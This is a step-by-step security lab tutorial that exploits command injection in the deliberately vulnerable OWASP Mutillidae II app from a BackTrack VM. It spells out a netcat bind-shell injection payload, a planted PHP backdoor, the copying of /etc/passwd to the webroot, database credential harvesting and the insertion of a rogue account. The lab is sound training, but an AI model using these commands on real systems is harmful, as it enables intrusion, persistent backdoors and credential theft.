{ Command Injection Netcat Session }
Section 0. Background Information |
- What Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is Command Injection?
- Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application. This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage. You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
- What is netcat?
- Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedor
- Note: Remote database access has been turned to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- Lab Notes
- In this lab we will do the following:
- Execute netcat using the command injection/execution vulnerability.
- Create a netcat backdoor outside of the command injection vulnerability.
- Conduct PHP Reconnaissance
- Conduct Database Reconnaissance
- Add a user to the nowasp.accounts table.
- Legal Disclaimer - không thực hành trên các mục tiêu mà bạn không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v5CBuvyc4pkRSq0ccIsVsxe779sHcxGvqrWbsa9Orp98ohf-p5F1IlhTMsA7oMbw0qFSfEtEf1949JI8LTbYVE7P-WBzMQBrZN0H5ntYe8XIXUUe3Ywy2L1BG3qv2iD3Qs4Kxou_PQ_dIyyitPiRlPG_sox31juNk0pTtrfNJNxGLZLualwAc=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_veGFpL3rXip9IcUAdALAn0KrU2zuTsul-GOAJ1HA9tiDUHCniJJFOB_ogidmyzKgRL3A8jARDb9r-Bu4Sr3KmVqzm4bIGugxUeet00X-9L3y7XCZNKqXbd1sdrr70BQaL_-Mn_Qu2SCq8UA7WsKMTsFCXo73T0aAwRnD0JhgSCxMEeMi9jH9A=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tgngWJ6Z4fQFAUTzG8zM2AQ5rdRnM-lKAjmvFSpY2y9XKKwbdzmbzzTOScPsHiDKzBBYew1rXiLjBEwEgs-oLN2iL_Yr1fX4Vch02XG7XnfaUm8DCl7KTldWBPKoFPhM960h21nny74Cd-kIZ70I3RQ8mONhZIXmWNXUauAIo7BOqL-COKrDn08g=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sCGVGtiOPzzZp_c1LOg1Z5IFz2o9W3hjqj0Z4ZDSmTkYz8V57MPFdKURdDEwwr4rI_t9G99VpjUSQnWW2OqbQ_1W0wUqJrs1-6wQ6IEpqVLrRIzd8dByd9w4lvLoukU7QJJhh0mFfSV0V5ubjTZO5zgmPMwdU_pUM_5W-KkVYol15sinQkyhnRYw=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smPxe1o41EFBmi2puBidYYnWD9Y90OUzQHvijIYJONAqrFCSHhPjlePfxHuPxlEsQLpQ7O8GPOBDGYskan6o3Ttfh59iANcJjegHds1LzT9m548mYipYfY5uobpilqL0o-VJpHBwtYgVn3RT7qejb-Xvuy-Q7Zidfn26sFeJKnZnmE-EGwNmPkqQ=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sOYYvN9mWZmI7hTWBIcvHbkhqEoMD5tFb7VcWWY9XzdjJgku3595_cbzaZEbAkGAwqcIN4IJ74p08gFY5APN2jFcW3E26LTP19trAphWIJ2HVNRDUACbgcbMZHQSgFAbQZcnqHf46CsK6St0UUu6rCJ7-lrbxRWYFR7i6ziKc08BVPEYbA3fshgA=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vIidFVFg5TwhAn5anWnFxIh6YRLxHxlfhmga6v4ccxzqKg54Z6rvCTIil0JOeFIXaQLXXWEm3V-QdUGBii_4oPhDx3NBIUR1MpMjuPfoujuwQ4AM8EfXXVhVejqYNs-I_WUQdlkRx4Ie37Fae_Rc1PZs7i7Vaf_aEcJnm6_zK8GuiSDY9iWHY=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tuS6_IRKjPE-kj74RF5DQxA7hJc8B1QbbyRHLStBI1NBkVX7MtCLUjoH0GAeNl1ZG8Q7orIEydy35bMm54L2GzaPr25E2CpJawgwJSkkHhCxlGVBOoAcj0vIlzLY4BBQ4W8Y4xsyWCEAEV2ARhUWDsVmAvRrheEPIH9QEftuXflzmi-sd3tFs=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.109.
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Metasploitable).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9MpDHSFdd_dJZAiD0sDr8WJrSApPyg0zKPBgtgUMMNYUSBTt1hmjkuB0cIEb-kA_LHE3rg6Y1qYDg5XvR4Z_PzGcr4O46x4zXLeJTvZBuiMA3ihTXVbNPtuTcq3rcG8z3XCwXyeUv5dS15TCFoe1K1bppnqmJhsy1doLfgmquWMFuu5UZ1tQ=s0-d)
Section 7. Start Web Browser Session to Mutillidae |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tWzDe13R8tya6-ysSUzJCBSQkRrDzY-Cd5qrYK4t-qm9Ttqqsl-D7iO3dVJnIdFYb7KfACy_xYjBzpstlbuJ9IzaS6R0i2kMsdpOQ9CCreQ07FKvtkm_HcvHjZGGgSKm7C4xo0AIGu_2bhDlS8ulslQrlKYRFTGe3khb6dPbmR7Vls106tHCoX=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- http://192.168.1.111/mutillidae
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u8CvP4FcTG8ifbWQqRTiZS8ktCoMdaYbG3_S5xbIVk8R4ut8LBvDErjfFk92kWDpkVM-shp28kX8GG962TNEa1BAI1KrnRgrCQfBJJrtVIwX0rJQMXBtg4s5hRc4omHih4c9MMYpK90UC5cpzQsw59hM8YRRi_pNmh4WTKN0vIewSmiJ2td5iL=s0-d)
Section 8. Netcat Command Execution |
- Go to DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tb6uNokt7r7I-MvvystKTk34JA-huKr3G-4q5rcoIVD6jItep0-kACAhK_ctR-q2rRnqIkjpnNIpJh-IRaDx5g1jcAGGqn8XWmv8U4aLxlKY-zh9i4ASTRWAxDdfWvfKijylif2zhTVIn_O29ROozvBMBLQ_LniynG4hO3yi2ly-KzRm-0JkBw=s0-d)
- Execute Netcat
- Notes(FYI):
- Below we are going to append NetCat to the basic nslookup test. :)
- Instructions:
- www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
- Make a FIFO named pipe.
- Pipes allow separate processes to communicate without having been designed explicitly to work together.
- This will allow two processes to connect to netcat.
- nc -l 4444, tells netcat to listen and allow connections on port 4444.
- Click Lookup DNS
- Continue to next step
- Note: No results will be displayed to this webpage, please continue to next step.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAp0Ay2HuFtTlbKQzNk5U4-7pTIuoeCy51RbMtvODRfbjzP6k_NOx268oByRr80lFPAsp17sTALPN22kOrs6z8Z9y_hXRjIPYaR_L3pu9IFesKMdfnAPzhh4i3TTLEAdwaaBc4doYPgnJmVgR4CTwURKVuPky42UmQvwV63Vy1U1zmEYizrKY=s0-d)
- Verifying Results
- Note(FYI):
- Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
- Notice in the lower left corner, the status bar displays the message transferring data.
- Both of these messages are a good signs that netcat is running and listening for a connection.
- Instructions:
- Continue to next section.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tNmNAiRohDEqtIzKKh4sBUHCYXr8thydFUA4ZScqDl5z5bR9nUjK2uDKpJh1apQKjqROKjI44tO6nPKjwFhx6oaeePZQGEmHhX-Zyu_B_txV6hMzRL-XsUDaOAg97Reqx_15HdRJtZrkmShe7AMs31QXSRD5oPJCeT7eZawm_Ao9CmaXao4pnM=s0-d)
Section 9. Connecting to Netcat |
- Connect to Netcat
- Notes(FYI):
- Implement the following instructions on the BackTrack VM
- Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
- Instructions:
- nc 192.168.1.111 4444
- Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
- hostname
- This is server hostname that hosts DVWA.
- whoami
- Print the effective UserID.
- Ie., Who am I connected as.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vn6W_xV-5OUfYcM9NGvyxEu7z3BnPZDRiMg-jZwkuHITF7PpPTSwwS4OqrmZlTtu1VpqaOiBmgjPGqWG3mGvXhwNYS37ppWHdFh7vtZ2qxlMxalCKMjzhYTI11iurtUewDYxHXKffeL-DCxXs93rfkiYkCYV8nELLusewZ_1iGYCUUgf8nd3hl=s0-d)
- Directory and Username Reconnaissance
- Notes (FYI):
- We already know that we connected as the apache user, but we also want to know what is our current working directory.
- Also, we want to know if we have the ability to create a file within the current working directory.
- Instructions:
- pwd
- Print the current working directory
- uname -a
- Print system information (eg., Operating System & Version, Kernel, etc).
- cat /etc/passwd > passwd.txt
- Create a passwd.txt file located in /var/www/html/mutillidae
- ls -l $PWD/passwd.txt
- List the passwd.txt file.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tu-u20S_yah3BEVGB4FoBsn91BJ4viawsgu0ZWJXbN1Ohmg_5_3EoC5ntUsGYZBtavnKOdPTPjYSdBdL9T8cJSbjJAnJEKfxKAEQNAS1ZAzs5zV8KXY45OjN4IzjEuQDtjnMSls22T_Px2YUr4xb0_tN9UgZ6ZeylmYZNR-QHc4X6FHzxXWSE=s0-d)
Section 10. Viewing /etc/passwd |
- Open New FireFox Tab
- Notes (FYI):
- Perform the following instructions on BackTrack's Firefox.
- Instructions:
- Click on the Green Plus to create a new tab
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_0jRpTXhRcdGVqwNfv7PoEGWxylNw5j2Bfccfj7b-xFcOedQdj57jx_GLljQ1YkaOnVpi1K92IH707MM_REhH6HjbQidz0EAyzAHBFtnIPGqJyDjfkuoiTmINu09HajvxSC_6gCSc_k6MxWkAxrG2zLUrll6wPQ57CrD7SqEEFzRslqXTpU5Z=s0-d)
- View /etc/passwd
- Notes (FYI):
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
- It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver. (Prepare for some black magic).
- Instructions:
- Place the following link in the Address Bar.
- http://192.168.1.111/mutillidae/passwd.txt
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uuvHSg3mPzHkmAG-ptZEsftRyCi6zynUo8rBDYaHoNZNgtPKLXLsl36ZJ7VjdFQm9uG3f77xUwP_cVKY3uKdzC-THn6aU4Hf_XmdIrLYuUeRwnWfHLkEqQsEejPCKRJOu7wmmZzSmy0l9tABs0KLXk40WqlPy647ij8Ke_KGT4d74KpA3ZsrF-=s0-d)
Section 11. Create PHP Backdoor |
- Discover the Database Engine using the /etc/passwd file
- Notes (FYI):
- Perform the following instructions using your previous BackTrack Terminal Netcat session.
- We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
- Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.
- Instructions:
- echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
- ls -l $PWD/nc_connect.php
- chmod 700 nc_connect.php
- ls -l $PWD/nc_connect.php
- cat nc_connect.php
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t57xidfOzDglVytChW4UQtlo_qoLsFS1XSVC8IQd4Jo0ZBIYQYSKNX1BkRS_JcWfwXIOk2BNoFoH0je_a-bH9ZgoCEJWx0n7h11k733HA-aOWh4JVaNFjpSS6tEXw3STkcvv5ImZhsmV6RrNp2qkPqLHboojrZPjZMPivzU4C1UVElb4X7bD5i=s0-d)
- Execute nc_connect.php
- Notes (FYI):
- Perform the next steps in BackTrack's second Firefox tab.
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
- Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.
- Instructions:
- Place the following link in the Address Bar.
- http://192.168.1.111/mutillidae/nc_connect.php
- Continue to Next Step
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vDzJAxiNa5Cntv5s1XcSMXtZJuMtcNwfSIgm1KkZxLkkR5tAlSMdCbuU2rmWHkKfIoV443j5V-iOtNCWgGWIWql75prT5WOPC_k18m91kDflTM7_rJ6QlZBwVn0AoUEJVnGuQjsU8KuwSJO83QJFwnqZmlIxDpjBDV5EK8ytQ_Sx90cWM4yxId=s0-d)
- On BackTrack, Start up a "another" terminal window
- Instructions:
- Click on the Terminal Window
- Viewing your netcat sessions
- Notes (FYI):
- This terminal window will be used to connect to the nc_config.php netcat session.
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
- Instructions:
- nc 192.168.1.111 3333
- whoami
- ps -eaf | egrep '(3333|4444)'
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tbJELc3fKZAMIr2H_8LuGGMBQNNA8wXeAKBNUE-Focvz_39Kv9iaH69C5CFdn49J2s3XtNE7bDH7hyNrYZJuotaVV805g7SdlQT4ZBxNmMcoRtxkxs-hDf0VI2f6-VRsZMp7r4GvQ7nnEZKIgJ9034l9ipUe-pZxBctB8c3NEiZc_hMp03CQaD=s0-d)
Section 10. PHP Script Interrogation |
- List all php scripts
- Notes (FYI):
- Perform the next steps in the nc_config.php netcat terminal.
- Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
- But, first, let's count all the php scripts and include files.
- Instructions:
- pwd
- This show the current working directory to be /var/www/html/mutillidae.
- find * -name "*.php" | wc -l
- Count the number of php script located in the current working directory.
- find * -name "*.inc" | wc -l
- Count the number of php include files located in the current working directory.
- List all php scripts
- Notes (FYI):
- Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
- Instructions:
- find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
- find * -name "*.inc", find all files with the *.inc extension in the current working directory.
- xargs, build and execute command lines from standard input
- grep -i password, ignore case and search for the string "password".
- egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vi6VG55WCv_WDGUCnUsyuS7pSeggXc3p_YESfgjUrF1OCOxHUI2uUGh05ehRSop-UIB9PpquchbGmuQMJhknIi3tcE9FQFoTZLTjcGsGx1QJ7zWRxmtOVRwAne2IcdKi4FNZmlAcUOlpZqamvmrF8Y8OmSmwA_UNbOCltvk_V_GNBWChYlrdZy=s0-d)
- Search php scripts for the string password
- Notes (FYI):
- Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
- I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
- The name of the script that contains the database password is MySQLHandler.php.
- Instructions:
- find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t3MzXNqopVpn000kCudpNyrrCDrqaCPkgyU9EsUQOux5OcP4oXD-z-AHEeIpp95KkKqRFeDveFShl_RMEfqZUMxPmU80UwWVemg8r-0WFGnvPA2V6TXDx1lzzAm1NLRYbyJza91CXN5GO8k7cmiqer-mnSADNSnp6FPNbkStVIVoXrsrF74V8=s0-d)
- Search MySQLHandler.php for authentication information
- Notes (FYI):
- Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
- Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
- Instructions:
- find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vDX3E7zIlmguFlWn6Ra4UwpStiqSiheCSj0rxhH0bDYSN6bxP8n8qXYg0eq2U3L6XCMbXCXnf7i_FSefHK9hutddc9DsKP98ON60KWHhe-OFkh0Ry52ifa2fzhAGlj1YSjGedtemspgEp5JC0glBM1LS9U1ysDiQuOesL-mUhPQ3UGmAnmtzY=s0-d)
Section 11. Database Interrogation |
- Basic Database Interrogation
- Notes (FYI):
- Perform the next steps in the nc_config.php netcat terminal.
- The below command shows you how to execute database commands in the netcat session.
- show databases, allows you to view all databases.
- use nowasp; show tables, means use the nowasp database and show its's tables.
- Instructions:
- echo "show databases;" | mysql -uroot -psamurai
- echo "use nowasp; show tables;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vg-mHSIt-ojvs-kTt5xl9wVLZvOylMK6FUX8NVwmSAJfoDf-Ko57KIHPdbLZhkZCRu9gTvPGYQHslNnWwsVhVkLzng2y9tVpHPpEz3LLYVEaHQ9_A3Tz4WECtS27mE3xi6EEc7hyn1R9AQ5cKG1W-YVjM8nmBVLhRg5B4WXCUVAlYz23Kdq0oa=s0-d)
- Interrogate the accounts table
- Notes (FYI):
- The below command shows you how to view the column fields of the accounts tables.
- In addition, you will run a basic select statement to view the contents of the accounts table.
- Instructions:
- echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
- echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voPPeOH5ZI4zS0ubfexQ1PtwJ647sTrHlqRUdV-H-G_0pwBREFsYMu4NrhMyInDl2tyQTUuoxmujO4PgHv8RxXXY_dlYmg1WErdocob6unN0loURdWgkbjANSuCjUHZTl5lV0MeqVdLYuA-QMsjNNb-FKNNHQZcaf-wpxb6ovYniGhuypish5_=s0-d)
- Create a new user in the accounts table
- Notes (FYI):
- The below command shows you how to create a new username using the MySQL insert command.
- Pay attention to the last record of your select statement results.
- Instructions:
- echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
- echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tfASsx1OJfHYjJsxl4IZqogq559mz2h1eaUV_cRIVIpMs8fsCbo_DBc-pTPCyiQzjhrFQvR_vN7nzdtTrBmhlTGGG--USoPSxlocvIP4qWYYIarDfyi_yTC0ajewiR_IZjTKuoVmLS33jB2szchNR0h0_oEd1SuyxrzJ-DwaMZf_pcaenQK5tj=s0-d)
- Proof of Lab
- Notes (FYI):
- Perform the next steps in the nc_config.php netcat terminal
- Use nc_config.php netcat session for the below directions.
- Instructions:
- echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
- netstat -nao | egrep '(3333|4444)'
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u7YxXdpmvuJ6Nv2599aeIBfDZFaioF7Mdmnn9VlhGBEgWGanv1EBUeEdQvVtOVnmgth9jWCXjDHurjuU9gqyUZBVqOXXaGJLSpzHD2NuSVnaRqpz8QR8dsOnZDK1eM16m2lcax1SOv6t2l-8pbvEd0UzQuu1p806xjM7xi-V0mV_egLhczAJHS=s0-d)
Không có nhận xét nào:
Đăng nhận xét